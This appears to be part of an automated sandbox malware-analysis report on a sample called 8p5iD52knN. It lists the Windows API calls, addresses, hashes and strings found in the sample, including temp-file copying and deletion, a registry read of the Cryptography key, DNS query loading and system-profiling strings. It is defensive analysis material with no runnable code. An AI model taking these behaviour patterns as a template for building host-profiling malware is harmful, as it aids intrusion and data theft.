                    • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
                    • Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
                    • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
                    APIs
                    • GetTickCount.KERNEL32 ref: 00410BFD
                    • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                    • DeleteFileW.KERNEL32(00000000), ref: 00410DBE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CopyCountDeleteTick
                    • String ID: %TEMP%$.tmp
                    • API String ID: 2381671008-3650661790
                    • Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                    • Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
                    • Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                    • Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58
                    APIs
                    • GetTickCount.KERNEL32 ref: 00410945
                    • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410B9C,?,.tmp,?,?,00000000,00410AE8,?,00000000,00410B63,?,00000000), ref: 004109C1
                    • DeleteFileW.KERNEL32(00000000), ref: 00410B06
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CopyCountDeleteTick
                    • String ID: %TEMP%$.tmp
                    • API String ID: 2381671008-3650661790
                    • Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                    • Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
                    • Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                    • Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                    • RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                    • API String ID: 3677997916-4173385793
                    • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                    • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
                    • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                    • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165AB
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004165B1
                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeLibraryLoadProcString
                    • String ID: @$GlobalMemoryStatusEx$kernel32.dll
                    • API String ID: 923276998-3878206809
                    • Opcode ID: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
                    • Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
                    • Opcode Fuzzy Hash: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
                    • Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C
                    APIs
                    • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406666
                    • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressCurrentHandleModuleProcProcess
                    • String ID: IsWow64Process$kernel32.dll
                    • API String ID: 4190356694-3024904723
                    • Opcode ID: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                    • Instruction ID: ba80d2391f81007aa42feea1da534082dc1adbf3711fe3d895332dec38dcedd5
                    • Opcode Fuzzy Hash: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                    • Instruction Fuzzy Hash: B0E06DB12143019EEB007EB58881A3B21C89B44305F130E3EA496F21C1E97EC8A0866D
                    APIs
                    • GetTickCount.KERNEL32 ref: 00410EB4
                    • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CopyCountFileTick
                    • String ID: %TEMP%$.tmp
                    • API String ID: 3448371392-3650661790
                    • Opcode ID: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                    • Instruction ID: 0e4f139da3bc19c2096e57fedbffea1b6a0c7ee0d64fc6893e7b5a554fe936bc
                    • Opcode Fuzzy Hash: dcbd54fc4c37fa41d1f3def047f476980ec269fdbcef2be5238ae35c760609eb
                    • Instruction Fuzzy Hash: D0411F31904249AEDB01EBA1D852ACDBF79EF49308F50447BF500B76A3D67CAE458A58
                    APIs
                    • GetTickCount.KERNEL32 ref: 00410EB4
                    • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CopyCountFileTick
                    • String ID: %TEMP%$.tmp
                    • API String ID: 3448371392-3650661790
                    • Opcode ID: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                    • Instruction ID: 2c73a4ceecea9b7a55c8e1441bd033eb3759b1d2195d340dd4b2e4f4f6784083
                    • Opcode Fuzzy Hash: b4051c86d89d16cbdd011401cb26392d540c890b59df4c5f9e00e45593a2b883
                    • Instruction Fuzzy Hash: DF412131904149AFDB01FFA1D842ACDBBB9EF49318F50447BF500B36A2D67CAE458A58
                    APIs
                    • GetTickCount.KERNEL32 ref: 00410EB4
                    • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CopyCountFileTick
                    • String ID: %TEMP%$.tmp
                    • API String ID: 3448371392-3650661790
                    • Opcode ID: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                    • Instruction ID: 3bd2312418c75e2bfd4f88111c3886d823680ea6e83d1d6075c9c2a9f0993f15
                    • Opcode Fuzzy Hash: fd3ed2e0f10af06c7055efab6d8518f1a7d31fde7c18b0f8517e5c88414f77f6
                    • Instruction Fuzzy Hash: 4241013190410DAEDB01FFA1D842ADDBBB9EF49318F50447BF500B36A2D77DAE458A58
                    APIs
                    • GetTickCount.KERNEL32 ref: 00410BFD
                    • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CopyCountFileTick
                    • String ID: %TEMP%$.tmp
                    • API String ID: 3448371392-3650661790
                    • Opcode ID: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                    • Instruction ID: ad1686550c7843c0884c0506788be05dc1fde737249d1bd281ecbc27d8194f8d
                    • Opcode Fuzzy Hash: 3c9c793cbba2b1494e5bbcc8797dd77cc55da2a1b03f1701932884ea86e2c921
                    • Instruction Fuzzy Hash: BF412330914109AEDB01FF91D952ADDBBBDEF49318F50447BF400B7292D77CAE458A58
                    APIs
                    • GetTickCount.KERNEL32 ref: 00410BFD
                    • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CopyCountFileTick
                    • String ID: %TEMP%$.tmp
                    • API String ID: 3448371392-3650661790
                    • Opcode ID: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                    • Instruction ID: ab4a798e1dfa23648b03a2b2561a2af29de01fabf162149de749457abe37d48b
                    • Opcode Fuzzy Hash: 7e65eb29c14a11400a8ae9f9535f570905a72362550addcf7d14f60cf147a02b
                    • Instruction Fuzzy Hash: 37411331910109AEDB01FF92D952ADDBBBDEF48318F50447BF400B3292D77DAE458A58
                    APIs
                      • Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102
                    • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
                    • DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AllocCopyDeleteString
                    • String ID: %TEMP%\curbuf.dat$LLA
                    • API String ID: 5292005-3909751444
                    • Opcode ID: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                    • Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
                    • Opcode Fuzzy Hash: 03760eacd4bf6eafee70f4f711e65bc97b6305d2d94ef0ca2e56f12b63379ea2
                    • Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99
                    APIs
                    • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                    • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: DnsQuery_A$dnsapi.dll
                    • API String ID: 2574300362-3847274415
                    • Opcode ID: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
                    • Instruction ID: ee02e28701cd333fe80aa916ff0e932040e536dc5bff3800914b034e455f76c5
                    • Opcode Fuzzy Hash: 724cfed19cb1d21381234b51a37364b79d38ba7da5abfef29c6bd78e431c9a57
                    • Instruction Fuzzy Hash: A9115E71A08304AED711DBA9CC52B9EBBB8DB45704F5140A7E504E72D2D6789E018B58
                    APIs
                    • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                    • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: DnsQuery_A$dnsapi.dll
                    • API String ID: 2574300362-3847274415
                    • Opcode ID: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
                    • Instruction ID: 3ed38bd560de987a20526e09c97c4f2d359d7c1ce2b9a36b0a47fbdadc566110
                    • Opcode Fuzzy Hash: 50f0b7069414203643d559ff8c1b4067f618f2f1807c4d8d96e87e961dc54617
                    • Instruction Fuzzy Hash: 48113D71A08304AEDB11DBA9CD52B9EBBB8DB44714F5140BBF904E73D1D6789E018B58
                    APIs
                    • LoadLibraryA.KERNEL32(user32.dll,EnumDisplayDevicesW,00000000,0041670D,?,-00000001,0041B0FC,?,?,00416863,Video Info,?,004169AC,?,GetRAM: ,?), ref: 00416678
                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0041667E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: EnumDisplayDevicesW$user32.dll
                    • API String ID: 2574300362-1693391355
                    • Opcode ID: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
                    • Instruction ID: bffb8a391e8cbf63d1c0eded9315efc20e69fe0ee1e689c0aa8ff6c2638661ea
                    • Opcode Fuzzy Hash: be31b090cf9e22f53fe63a2b9ccc94bb75e49f076f039a93db071de62ba29d85
                    • Instruction Fuzzy Hash: 7E118970500618AFDB61EF61CC45BDABBBCEF84709F1140FAE508A6291D6789E848E58
                    APIs
                    • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,00417F22,?,00000000,00000011,00000000), ref: 00417EB1
                    • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 00417EB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: DnsQuery_A$dnsapi.dll
                    • API String ID: 2574300362-3847274415
                    • Opcode ID: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
                    • Instruction ID: 92d1eb556667ed81b8552bf9075b82756b3340621e6324b7cba7be93811987cb
                    • Opcode Fuzzy Hash: a19d4597b475aaa9ac328eaf6b87c7589b0a3e1b2296b7586c6c4fb46158065e
                    • Instruction Fuzzy Hash: 20111CB1A04304AED751DBAACD42B9FBBF8EB48714F5140B6F904E73C1E678DE418A58
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908458496.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_420000_8p5iD52knN.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
                    • Instruction ID: 9440fa168d12a83eba1a092897212109d6b0fc6f12ae44bfa852d76b5e73477e
                    • Opcode Fuzzy Hash: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
                    • Instruction Fuzzy Hash: 0B114E7300014ABBCF125E85DC518EE7F22BB1C354F59981AFE2859135C67ACAB2AB85
                    APIs
                    • RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                    • RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                    • LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                    • RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                    • String ID:
                    • API String ID: 730355536-0
                    • Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                    • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
                    • Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                    • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
                    APIs
                    • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,^), ref: 004024AF
                    • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00402524), ref: 00402517
                      • Part of subcall function 00401870: RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                      • Part of subcall function 00401870: RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                      • Part of subcall function 00401870: LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                      • Part of subcall function 00401870: RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                    • String ID: ^
                    • API String ID: 2227675388-551292248
                    • Opcode ID: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
                    • Instruction ID: 4ed45a5183fb1a6edd108f9af425bfacc088641811e0c18f6da98f6ec62fa594
                    • Opcode Fuzzy Hash: 36f5b8f16900d0e995ce4c5524c526641fb23a44d7305ae2e8247758f3247216
                    • Instruction Fuzzy Hash: 92113431700210AEEB25AB7A5F49B5A7BD59786358F20407FF404F32D2D6BD9C00825C